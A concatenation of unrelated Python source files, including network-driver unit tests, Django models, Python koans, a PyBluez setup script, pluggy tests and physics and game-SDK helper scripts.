mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1,1/1/0/2
interface 1/1/0/1
cfab port-mode external
type endpoint
exit
interface 1/1/0/2
cfab port-mode external
type endpoint
exit
vfab 1 vlan 8 endpoint untag 0
"""
self.driver.clear_vlan("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete')
self.assert_configured(expect)
class TestCFABdriverClearVlanWithLAG(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver for VLAN configuration."""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverClearVlanWithLAG, self).setUp()
self.ports = "1/1/0/1,1/1/0/2"
def test_raises(self):
mgr = self.driver.mgr
cfab = self.driver
for er in [EOFError, EnvironmentError, OSError, select.error]:
mgr.get_candidate_config.side_effect = er
self.assertRaises(er,
cfab.clear_vlan_with_lag, 'a', 'u', 'p', '1', 8,
self.ports, self.mac)
self.assertEqual(4, mgr.close_session.call_count)
def test_ifgroup_ether_is_exhauted(self):
cfab = self.driver
mgr = self.driver.mgr
candidate = ""
for i in range(0, 4096):
candidate += 'ifgroup {if_id} ether 1/1/0/{port}\n'.format(
if_id=i, port=(i + 1))
mgr.get_candidate_config.return_value = candidate
ret = cfab.clear_vlan_with_lag("a", "u", "p", "1", 8,
self.ports, self.mac)
self.assertIsNone(ret)
def test_clear_with_no_command(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/2
type linkaggregation 1
lldp mode enable
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
vfab 1 vlan 8 endpoint untag 0
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') + cfab_cmd('lag', 'delete')
self.assert_configured(expect)
def test_eliminate_own_definition(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
ifgroup 1 linkaggregation 1 2
interface 1/1/0/1
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/2
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/3
type linkaggregation 2
lldp mode enable
exit
interface 1/1/0/4
type linkaggregation 2
lldp mode enable
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
linkaggregation 1 2 cfab port-mode external
linkaggregation 1 2 mode active
linkaggregation 1 2 type endpoint
vfab 1 vlan 8 endpoint untag 0,1
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'replace', ifg='1') \
+ cfab_cmd('lag', 'delete')
self.assert_configured(expect)
def test_already_cleared_only_interface(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
lldp mode enable
exit
interface 1/1/0/2
lldp mode enable
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
vfab 1 vlan 8 endpoint untag 0
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports)
self.assert_configured(expect)
def test_already_cleared_only_vlan(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/2
type linkaggregation 1
lldp mode enable
exit
linkaggregation 1 1 cfab port-mode external
linkaggregation 1 1 mode active
linkaggregation 1 1 type endpoint
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('lag', 'delete')
self.assert_configured(expect)
def test_already_cleared_lag_definition(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 linkaggregation 1 1
interface 1/1/0/1
type linkaggregation 1
lldp mode enable
exit
interface 1/1/0/2
type linkaggregation 1
lldp mode enable
exit
vfab 1 vlan 8 endpoint untag 0
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports) \
+ cfab_cmd('vlan', 'delete') \
+ cfab_cmd('lag', 'delete')
self.assert_configured(expect)
def test_already_cleared_all_definitions(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
interface 1/1/0/1
exit
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports)
self.assert_configured(expect)
def test_exists_ether_vlan(self):
cfab = self.driver
mgr = self.driver.mgr
mgr.get_candidate_config.return_value = """
ifgroup 0 ether 1/1/0/1
ifgroup 1 ether 1/1/0/2
interface 1/1/0/1
type endpoint
cfab port-mode external
exit
interface 1/1/0/2
type endpoint
cfab port-mode external
exit
vfab 1 vlan 8 endpoint untag 0-1
"""
cfab.clear_vlan_with_lag("a", "u", "p", "1", 8, self.ports, self.mac)
mgr.connect.assert_called_once_with("a", "u", "p")
mgr.get_candidate_config.assert_called_once_with()
expect = cfab_cmd('interface', 'delete', ports=self.ports)
self.assert_configured(expect)
class TestCFABdriverPrivateMethods(BaseTestCFABdriver):
"""Test Fujitsu C-Fabric mechanism driver with private methods.
This class is for illegal case tests.
"""
def setUp(self):
cfg.CONF.set_override('share_pprofile', True, "fujitsu_cfab")
cfg.CONF.set_override('pprofile_prefix', "test-", "fujitsu_cfab")
super(TestCFABdriverPrivateMethods, self).setUp()
def test_is_ifgroup_included_between_range(self):
ifgroup_id = 2
ifgroups = '1-3'
self.assertTrue(cfabdriver._is_ifgroup_included(ifgroup_id, ifgroups))
def cfab_cmd(target, op, vfab_id='1', vlanid=8, pp_name='test-1', ppid='0',
lag=False, ports='1/1/0/1', domain_id='1', lag_id='1', ifg='0'):
"""Expected result for C-Fabric commands via operations.
@param target A string of target definition name. Following targets are
available:
'interface', 'lag', 'vlan', 'ifgroup', 'ifgroup_lag'
'assoc', 'pp_assoc'
@param op A string of operation. Following operations are available:
'add', 'replace', 'delete'
@return ret A list of string object
"""
ret = []
if target is 'interface':
ret.append("interface range {ports}".format(ports=ports))
if op is 'add' or op is 'replace':
if lag:
ret.append('type linkaggregation {lag}'.format(lag=lag_id))
else:
ret.append("cfab port-mode external")
ret.append("type endpoint")
if op is 'delete':
ret.append('no type')
ret.append("no cfab port-mode")
ret.append('exit')
elif target is 'lag':
lag = 'linkaggregation {dom} {lag}'.format(lag=lag_id, dom=domain_id)
if op is 'add' or op is 'replace':
ret.append(lag + ' cfab port-mode external')
ret.append(lag + ' mode active')
ret.append(lag + ' type endpoint')
if op is 'delete':
ret.append('no ' + lag + ' cfab port-mode')
ret.append('no ' + lag + ' mode')
ret.append('no ' + lag + ' type')
elif target is 'vlan':
if op is 'add' or op is 'replace':
ret.append("vfab {vfab} vlan {vid} endpoint untag {ifg}".format(
vfab=vfab_id, vid=vlanid, ifg=ifg))
if op is 'delete':
ret.append("no vfab {vfab} vlan {vid} endpoint untag".format(
vfab=vfab_id, vid=vlanid))
elif target is 'ifgroup':
if op is 'add':
if lag:
ret.append("ifgroup {ifg} linkaggregation {dom} {lag}".format(
ifg=ifg, dom=domain_id, lag=lag_id))
else:
ret.append('ifgroup {ifg} ether {p}'.format(ifg=ifg, p=ports))
elif target is 'assoc':
if op is 'delete':
ret.append("no pprofile {pp_name}".format(pp_name=pp_name))
elif target is 'pp_assoc':
if op is 'delete':
ret.append("no vfab {vfab} pprofile {ppid}".format(
vfab=vfab_id, ppid=ppid))
ret.append("no pprofile {pp_name}".format(pp_name=pp_name))
else:
raise 'Illegal target(%s) is specified' % target
return ret
|
import unittest
import subprocess
class ConversionTestCase(unittest.TestCase):
conversion_cls = None
def setUp(self):
super(ConversionTestCase, self).setUp()
self.conversion = self.conversion_cls()
self.null = open('/dev/null', 'w')
def tearDown(self):
super(ConversionTestCase, self).tearDown()
self.null.close()
def assertCommandExists(self, command):
rt = subprocess.call(['which', command], stdout=self.null)
self.assertEquals(rt, 0, 'Command {} not found'.format(command))
|
"""
Unit Tests for seq_prob_ratio.py
"""
import math
from nose.tools import assert_equal, assert_almost_equal, assert_less, raises
from nose.plugins.attrib import attr
from ..sprt import seq_prob_ratio
from ..sprt import bernoulli_lh
from ..sprt import bernoulli_seq_ratio
from ..sprt import normal_lh
from ..sprt import normal_seq_ratio
from ..sprt import hypergeom_lh
from ..sprt import hypergeom_seq_ratio
import math
import numpy as np
import scipy
from scipy.special import comb
def test_normalTRUE():
assert_equal(seq_prob_ratio(0.5, 0.1, [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 7, 6, 5, 4, 3], 0.05, 0.6, "normal", True)[0], 1)
def test_normalFALSE():
assert_equal(seq_prob_ratio(0.5, 0.1, [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 7, 6, 5, 4, 3], 0.05, 0.6, "normal", True)[0], 1)
def test_bernoulliTRUE():
assert_equal(math.trunc(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "bernoulli", True)[0]), 0)
def test_bernoulliFALSE():
assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "bernoulli", False)[0], None)
def test_hypergeomTRUE():
assert_equal(seq_prob_ratio(0.5, 0.1, [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 7, 6, 5, 4, 3], 0.05, 0.6, "hypergeometric", True)[0], 0)
def test_hypergeomFALSE():
assert_equal(seq_prob_ratio(0.5, 0.1, [1, 2, 3, 4, 5, 6, 7, 8, 9, 1, 2, 3, 4, 5, 6, 7, 8, 9, 8, 7, 6, 5, 4, 3], 0.05, 0.6, "hypergeometric", False)[0], 0)
#def test_normalTRUE2():
# assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "normal", True)[2], 'Reject null hypothesis.')
def test_normalFALSE2():
assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "normal", False)[0], None)
def test_hypergeomFALSE2():
assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "normal", False)[0], None)
def test_normalTRUE2():
assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "normal", True)[2], "Reject null hypothesis.")
def test_normalFALSE2():
assert_equal(seq_prob_ratio(0.5, 0.1, [0, 1], 0.05, 0.05, "normal", False)[0], None)
|
""" Melhore o jogo do desafio 028 onde computador vai "pensar" em
um numero entre 0 e 10. So que agora o jogador vai tentar adivinhar
até acertar, mostrando no final quantos palpites foram
necessarios para vencer. """
from random import randint
numero = randint(0,10)
jogador = int(input('Qual numero o computador pensou [0 a 10]? '))
cont = 0
while numero != jogador:
cont += 1
print('VOCÊ ERROU, TENTE NOVAMENTE!', end='')
jogador = int(input('Informe um numero:'))
print(f'Parabens você VENCEU, foram necessaria {cont} tentativas!')
|
from django.contrib.auth import get_user_model
from rest_framework import viewsets
from django_pyjwt_example import serializers
class UserViewSet(viewsets.ReadOnlyModelViewSet):
queryset = get_user_model().objects.all()
serializer_class = serializers.UserSerializer
|
from django.db import models
from .validators import validate_is_pdf
class PdfFile(models.Model):
series = models.ForeignKey(
'Series',
on_delete=models.CASCADE,
related_name='pdfs',
blank=True,
null=True,
)
file = models.FileField(upload_to='pdfs/%Y/', validators=[validate_is_pdf])
is_imported = models.BooleanField(default=False)
def __str__(self):
return f'<{self.__class__.__name__} {self.file.name}>'
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutIteration(Koan):
def test_iterators_are_a_type(self):
it = iter(range(1,6))
total = 0
for num in it:
total += num
# >>> [x for x in range(1,6)]
# [1, 2, 3, 4, 5]
self.assertEqual(15, total)
def test_iterating_with_next(self):
stages = iter(['alpha','beta','gamma'])
try:
self.assertEqual('alpha', next(stages))
next(stages)
self.assertEqual('gamma', next(stages))
next(stages)
except StopIteration as ex:
err_msg = 'Ran out of iterations'
self.assertRegex(err_msg, 'Ran out of iterations')
# ------------------------------------------------------------------
def add_ten(self, item):
return item + 10
def test_map_transforms_elements_of_a_list(self):
seq = [1, 2, 3]
mapped_seq = list()
mapping = map(self.add_ten, seq)
self.assertNotEqual(list, mapping.__class__)
self.assertEqual(map, mapping.__class__)
# In Python 3 built in iterator funcs return iterable view objects
# instead of lists
for item in mapping:
mapped_seq.append(item)
self.assertEqual([11, 12, 13], mapped_seq)
# Note, iterator methods actually return objects of iter type in
# python 3. In python 2 map() would give you a list.
def test_filter_selects_certain_items_from_a_list(self):
# >>> seq = [1, 2, 3, 4, 5, 6]
# >>> def is_even(item): return (item % 2) == 0
# ...
# >>> f = filter(is_even, seq)
# >>> type(f)
# <class 'filter'>
# >>> type(list(f))
# <class 'list'>
# >>> list(f)
# [] # NOPE
# >>> f
# <filter object at 0x10a41e908>
# >>> iter(f)
# <filter object at 0x10a41e908>
# >>> [x for x in f] # STILL NOPE
# []
# >>> [x for x in filter(is_even, seq)] # OK
# [2, 4, 6]
# >>> f = filter(is_even, seq)
# >>> next(f)
# 2
# >>> next(f)
# 4
# >>> next(f)
# 6
# >>> next(f)
# Traceback (most recent call last):
# File "<stdin>", line 1, in <module>
# StopIteration
def is_even(item):
return (item % 2) == 0
seq = [1, 2, 3, 4, 5, 6]
even_numbers = list()
for item in filter(is_even, seq):
even_numbers.append(item)
self.assertEqual([2, 4, 6], even_numbers)
def test_just_return_first_item_found(self):
def is_big_name(item):
return len(item) > 4
names = ["Jim", "Bill", "Clarence", "Doug", "Eli","BadBoyBuba"]
name = None
iterator = filter(is_big_name, names)
try:
name = next(iterator)
print(f"next: {name}") # next: Clarence
name = next(iterator)
print(f"next: {name}") # next: BadBoyBuba
name = next(iterator) # trigger exception
print(f"next: {name}")
except StopIteration:
msg = 'Ran out of big names'
print(f"StopIteration: {msg}")
self.assertEqual('BadBoyBuba', name)
# ------------------------------------------------------------------
def add(self,accum,item):
return accum + item
def multiply(self,accum,item):
return accum * item
def test_reduce_will_blow_your_mind(self):
import functools
# As of Python 3 reduce() has been demoted from a builtin function
# to the functools module.
result = functools.reduce(self.add, [2, 3, 4])
self.assertEqual(int, result.__class__)
# Reduce() syntax is same as Python 2
self.assertEqual(9, result)
result2 = functools.reduce(self.multiply, [2, 3, 4], 1)
self.assertEqual(24, result2)
# Extra Credit:
# Describe in your own words what reduce does.
# take first 2 parameters and pass to function
# use the retuned value an the next parameter and pass to function
# keep going until no more parameters left, return final value.
# ------------------------------------------------------------------
def test_use_pass_for_iterations_with_no_body(self):
for num in range(1,5):
pass
self.assertEqual(4, num)
# ------------------------------------------------------------------
def test_all_iteration_methods_work_on_any_sequence_not_just_lists(self):
# Ranges are an iterable sequence
# filter(by_this_function, data_to_filter)
# map(apply_this_function, data_to_process)
result = map(self.add_ten, range(1,4))
self.assertEqual([11,12,13], list(result))
try:
file = open("example_file.txt")
# contains:
# this
# is
# a
# test
try:
def make_upcase(line):
return line.strip().upper()
upcase_lines = map(make_upcase, file.readlines())
self.assertEqual(['THIS', 'IS', 'A', 'TEST'], list(upcase_lines))
finally:
# Arg, this is ugly.
# We will figure out how to fix this later.
file.close()
except IOError:
# should never happen
self.fail()
def test_quick_re_write_of_previous_test(self):
# Ranges are an iterable sequence
# filter(by_this_function, data_to_filter)
# map(apply_this_function, data_to_process)
try: # this this should close the file on a raise - test?
with open("example_file.txt") as f:
def make_upcase(line):
return line.strip().upper()
upcase_lines = map(make_upcase, f.readlines())
self.assertEqual(['THIS', 'IS', 'A', 'TEST'], list(upcase_lines))
except IOError:
# should never happen
self.fail()
|
#!/usr/bin/env python
from setuptools import setup, Extension
import sys
import platform
import os
from py4a import patch_distutils
patch_distutils()
mods = []
if sys.platform == 'win32':
XP2_PSDK_PATH = os.path.join(os.getenv('ProgramFiles'), r"Microsoft Platform SDK for Windows XP SP2")
S03_PSDK_PATH = os.path.join(os.getenv('ProgramFiles'), r"Microsoft Platform SDK")
S08_PSDK_PATH = os.path.join(os.getenv('ProgramFiles'), r"Microsoft SDKs\\Windows\\v6.0A")
PSDK_PATH = None
for p in [ XP2_PSDK_PATH, S03_PSDK_PATH, S08_PSDK_PATH ]:
if os.path.exists(p):
PSDK_PATH = p
break
if PSDK_PATH is None:
raise SystemExit ("Can't find the Windows XP Platform SDK")
lib_path = os.path.join(PSDK_PATH, 'Lib')
if '64' in platform.architecture()[0]:
lib_path = os.path.join(lib_path, 'x64')
mod1 = Extension ('bluetooth._msbt',
include_dirs = ["%s\\Include" % PSDK_PATH],
library_dirs = [lib_path],
libraries = [ "WS2_32", "Irprops" ],
sources=['msbt\\_msbt.c'],)
mods = [ mod1 ]
# widcomm ?
WC_BASE = os.path.join(os.getenv('ProgramFiles'), r"Widcomm\BTW DK\SDK")
if os.path.exists (WC_BASE):
mod2 = Extension ('bluetooth._widcomm',
include_dirs = [ "%s\\Inc" % WC_BASE ],
define_macros = [ ('_BTWLIB', None) ],
library_dirs = [ "%s\\Release" % WC_BASE,
"%s\\Lib" % PSDK_PATH, ],
libraries = [ "WidcommSdklib", "ws2_32", "version", "user32", "Advapi32", "Winspool", "ole32", "oleaut32" ],
sources = [ "widcomm\\_widcomm.cpp",
"widcomm\\inquirer.cpp",
"widcomm\\rfcommport.cpp",
"widcomm\\rfcommif.cpp",
"widcomm\\l2capconn.cpp",
"widcomm\\l2capif.cpp",
"widcomm\\sdpservice.cpp",
"widcomm\\util.cpp" ]
)
mods.append (mod2)
elif sys.platform == 'linux2':
mod1 = Extension('bluetooth._bluetooth',
sources = ['bluez/bluetooth/hci.c',
'bluez/bluetooth/bluetooth.c',
'bluez/bluetooth/sdp.c',
'bluez/btmodule.c',
'bluez/btsdp.c'])
mods = [ mod1 ]
elif sys.platform == 'darwin':
mod1 = Extension('bluetooth._osxbt',
include_dirs = ["/System/Library/Frameworks/IOBluetooth.framework/Headers",
"/System/Library/Frameworks/CoreFoundation.framework/Headers"],
extra_link_args = ['-framework IOBluetooth -framework CoreFoundation'],
sources = ['osx/_osxbt.c']
)
mods = [ mod1 ]
setup ( name = 'PyBluez',
version = '0.19',
description = 'Bluetooth Python extension module',
author="Albert Huang",
author_email="ashuang@alum.mit.edu",
url="http://org.csail.mit.edu/pybluez",
ext_modules = mods,
packages = [ "bluetooth", ],
# for the python cheese shop
classifiers = [ 'Development Status :: 4 - Beta',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python',
'Topic :: Communications' ],
download_url = 'http://org.csail.mit.edu/pybluez/download.html',
long_description = 'Bluetooth Python extension module to allow Python developers to use system Bluetooth resources. PyBluez works with GNU/Linux and Windows XP.',
maintainer = 'Albert Huang',
maintainer_email = 'ashuang@alum.mit.edu',
license = 'GPL',
)
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Converts .nii files in LiTS dataset to .npy files.
This script should be run just once before running convert_lits.{py,borg}.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import multiprocessing
import os
# Standard Imports
import nibabel as nib
import numpy as np
num_processes = 2
input_path = "Downloads/LiTS/Train/" # where the .nii files are.
output_path = "Downloads/LiTS/Train_np/" # where you want to put the npy files.
def process_one_file(image_path):
"""Convert one nii file to npy."""
im_id = os.path.basename(image_path).split("volume-")[1].split(".nii")[0]
label_path = image_path.replace("volume-", "segmentation-")
image = nib.load(image_path).get_data().astype(np.float32)
label = nib.load(label_path).get_data().astype(np.float32)
print("image shape: {}, dtype: {}".format(image.shape, image.dtype))
print("label shape: {}, dtype: {}".format(label.shape, label.dtype))
np.save(os.path.join(output_path, "volume-{}.npy".format(im_id)), image)
np.save(os.path.join(output_path, "segmentation-{}.npy".format(im_id)), label)
nii_dir = os.path.join(input_path, "volume-*")
p = multiprocessing.Pool(num_processes)
p.map(process_one_file, glob.glob(nii_dir))
|
import pytest
from pluggy import PluginManager, HookimplMarker, HookspecMarker
hookspec = HookspecMarker("example")
hookimpl = HookimplMarker("example")
def test_parse_hookimpl_override() -> None:
class MyPluginManager(PluginManager):
def parse_hookimpl_opts(self, module_or_class, name):
opts = PluginManager.parse_hookimpl_opts(self, module_or_class, name)
if opts is None:
if name.startswith("x1"):
opts = {} # type: ignore[assignment]
return opts
class Plugin:
def x1meth(self):
pass
@hookimpl(hookwrapper=True, tryfirst=True)
def x1meth2(self):
yield # pragma: no cover
class Spec:
@hookspec
def x1meth(self):
pass
@hookspec
def x1meth2(self):
pass
pm = MyPluginManager(hookspec.project_name)
pm.register(Plugin())
pm.add_hookspecs(Spec)
hookimpls = pm.hook.x1meth.get_hookimpls()
assert len(hookimpls) == 1
assert not hookimpls[0].hookwrapper
assert not hookimpls[0].tryfirst
assert not hookimpls[0].trylast
assert not hookimpls[0].optionalhook
hookimpls = pm.hook.x1meth2.get_hookimpls()
assert len(hookimpls) == 1
assert hookimpls[0].hookwrapper
assert hookimpls[0].tryfirst
def test_warn_when_deprecated_specified(recwarn) -> None:
warning = DeprecationWarning("foo is deprecated")
class Spec:
@hookspec(warn_on_impl=warning)
def foo(self):
pass
class Plugin:
@hookimpl
def foo(self):
pass
pm = PluginManager(hookspec.project_name)
pm.add_hookspecs(Spec)
with pytest.warns(DeprecationWarning) as records:
pm.register(Plugin())
(record,) = records
assert record.message is warning
assert record.filename == Plugin.foo.__code__.co_filename
assert record.lineno == Plugin.foo.__code__.co_firstlineno
def test_plugin_getattr_raises_errors() -> None:
"""Pluggy must be able to handle plugins which raise weird exceptions
when getattr() gets called (#11).
"""
class DontTouchMe:
def __getattr__(self, x):
raise Exception("can't touch me")
class Module:
pass
module = Module()
module.x = DontTouchMe() # type: ignore[attr-defined]
pm = PluginManager(hookspec.project_name)
# register() would raise an error
pm.register(module, "donttouch")
assert pm.get_plugin("donttouch") is module
def test_not_all_arguments_are_provided_issues_a_warning(pm: PluginManager) -> None:
"""Calling a hook without providing all arguments specified in
the hook spec issues a warning."""
class Spec:
@hookspec
def hello(self, arg1, arg2):
pass
@hookspec(historic=True)
def herstory(self, arg1, arg2):
pass
pm.add_hookspecs(Spec)
with pytest.warns(UserWarning, match=r"'arg1', 'arg2'.*cannot be found.*$"):
pm.hook.hello()
with pytest.warns(UserWarning, match=r"'arg2'.*cannot be found.*$"):
pm.hook.hello(arg1=1)
with pytest.warns(UserWarning, match=r"'arg1'.*cannot be found.*$"):
pm.hook.hello(arg2=2)
with pytest.warns(UserWarning, match=r"'arg1', 'arg2'.*cannot be found.*$"):
pm.hook.hello.call_extra([], kwargs=dict())
with pytest.warns(UserWarning, match=r"'arg1', 'arg2'.*cannot be found.*$"):
pm.hook.herstory.call_historic(kwargs=dict())
def test_repr() -> None:
class Plugin:
@hookimpl
def myhook(self):
raise NotImplementedError()
pm = PluginManager(hookspec.project_name)
plugin = Plugin()
pname = pm.register(plugin)
assert repr(pm.hook.myhook.get_hookimpls()[0]) == (
f"<HookImpl plugin_name={pname!r}, plugin={plugin!r}>"
)
|
#!/usr/bin/env python
import sys
import numpy as np
from edrixs.iostream import write_emat, write_umat
def get_hopping_coulomb():
N_site = 16
norbs = 32
U, t = 4.0, -1.0
umat=np.zeros((norbs, norbs, norbs, norbs), dtype=np.complex128)
for i in range(N_site):
off = i*2
umat[off, off+1, off+1, off] = U
hopp=np.zeros((N_site, N_site), dtype=np.complex128)
indx=[
[3,1,12,4], [0,2,13,5], [1,3,14,6], [2,0,15,7],
[7,5,0,8], [4,6,1,9], [5,7,2,10], [6,4,3,11],
[11,9,4,12], [8,10,5,13], [9,11,6,14], [10,8,7,15],
[15,13,8,0], [12,14,9,1,],[13,15,10,2], [14,12,11,3]
]
for i, item in enumerate(indx):
hopp[i,item[0]] = hopp[i,item[1]] = hopp[i,item[2]] = hopp[i,item[3]] = t
hopping=np.zeros((norbs, norbs), dtype=np.complex128)
hopping[0:norbs:2, 0:norbs:2] = hopp
hopping[1:norbs:2, 1:norbs:2] = hopp
write_emat(hopping, "hopping_i.in", 1E-10)
write_umat(umat, "coulomb_i.in", 1E-10)
def get_config():
config_in=[
"&control",
"ed_solver = 1",
"num_val_orbs = 32",
"neval = 1",
"nvector = 1",
"maxiter = 500",
"eigval_tol = 1E-10",
"idump = .false.",
"&end"
]
f=open('config.in', 'w')
for line in config_in:
f.write(line+"\n")
f.close()
if __name__ == "__main__":
get_hopping_coulomb()
get_config()
|
import os
import sys
from SteamworksParser import steamworksparser
class InternalConstant:
def __init__(self, name, value, type_, precomments, comment, spacing):
self.name = name
self.value = value
self.type = type_
self.precomments = precomments
self.comment = comment
self.spacing = spacing
g_TypeDict = {
# Not a bug... But, it's a giant hack.
# The issue is that most of these are used as the MarshalAs SizeConst in C# amongst other things and C# wont auto convert them.
"uint32": "int",
"unsigned int": "int",
"uint64": "ulong",
"size_t": "int",
}
g_SkippedDefines = (
"VALVE_COMPILE_TIME_ASSERT(",
"REFERENCE(arg)",
"STEAM_CALLBACK_BEGIN(",
"STEAM_CALLBACK_MEMBER(",
"STEAM_CALLBACK_ARRAY(",
"END_CALLBACK_INTERNAL_BEGIN(",
"END_CALLBACK_INTERNAL_SWITCH(",
"END_CALLBACK_INTERNAL_END()",
"STEAM_CALLBACK_END(",
"INVALID_HTTPCOOKIE_HANDLE",
"BChatMemberStateChangeRemoved(",
"STEAM_COLOR_RED(",
"STEAM_COLOR_GREEN(",
"STEAM_COLOR_BLUE(",
"STEAM_COLOR_ALPHA(",
"INVALID_SCREENSHOT_HANDLE",
"_snprintf",
"S_API",
"STEAM_CALLBACK(",
"STEAM_CALLBACK_MANUAL(",
"STEAM_GAMESERVER_CALLBACK(",
"k_steamIDNil",
"k_steamIDOutofDateGS",
"k_steamIDLanModeGS",
"k_steamIDNotInitYetGS",
"k_steamIDNonSteamGS",
"BREAKPAD_INVALID_HANDLE",
"STEAM_PS3_PATH_MAX",
"STEAM_PS3_SERVICE_ID_MAX",
"STEAM_PS3_COMMUNICATION_ID_MAX",
"STEAM_PS3_COMMUNICATION_SIG_MAX",
"STEAM_PS3_LANGUAGE_MAX",
"STEAM_PS3_REGION_CODE_MAX",
"STEAM_PS3_CURRENT_PARAMS_VER",
"STEAMPS3_MALLOC_INUSE",
"STEAMPS3_MALLOC_SYSTEM",
"STEAMPS3_MALLOC_OK",
"S_CALLTYPE",
"POSIX",
"STEAM_PRIVATE_API(",
"STEAMNETWORKINGSOCKETS_INTERFACE",
# We just create multiple versions of this struct, Valve renamed them.
"ControllerAnalogActionData_t",
"ControllerDigitalActionData_t",
"ControllerMotionData_t",
#"INVALID_HTTPREQUEST_HANDLE",
)
g_SkippedConstants = (
# ISteamFriends
"k_FriendsGroupID_Invalid",
# ISteamHTMLSurface
"INVALID_HTMLBROWSER",
# ISteamInventory
"k_SteamItemInstanceIDInvalid",
"k_SteamInventoryResultInvalid",
"k_SteamInventoryUpdateHandleInvalid",
# ISteamMatchmaking
"HSERVERQUERY_INVALID",
# ISteamRemoteStorage
"k_UGCHandleInvalid",
"k_PublishedFileIdInvalid",
"k_PublishedFileUpdateHandleInvalid",
"k_UGCFileStreamHandleInvalid",
# ISteamUGC
"k_UGCQueryHandleInvalid",
"k_UGCUpdateHandleInvalid",
# SteamClientPublic
"k_HAuthTicketInvalid",
# SteamTypes
"k_JobIDNil",
"k_uBundleIdInvalid",
"k_uAppIdInvalid",
"k_uDepotIdInvalid",
"k_uAPICallInvalid",
"k_uManifestIdInvalid",
"k_ulSiteIdInvalid",
# steamnetworkingtypes.h
"k_HSteamNetConnection_Invalid",
"k_HSteamListenSocket_Invalid",
"k_HSteamNetPollGroup_Invalid",
"k_SteamDatagramPOPID_dev",
#TODO: Skip all these once we have typedef autogen hooked up.
#public const ulong k_GIDNil = 0xffffffffffffffffull;
#public const ulong k_TxnIDNil = k_GIDNil;
#public const ulong k_TxnIDUnknown = 0;
#public const int k_uPackageIdFreeSub = 0x0;
#public const int k_uPackageIdInvalid = 0xFFFFFFFF;
#public const ulong k_ulAssetClassIdInvalid = 0x0;
#public const int k_uPhysicalItemIdInvalid = 0x0;
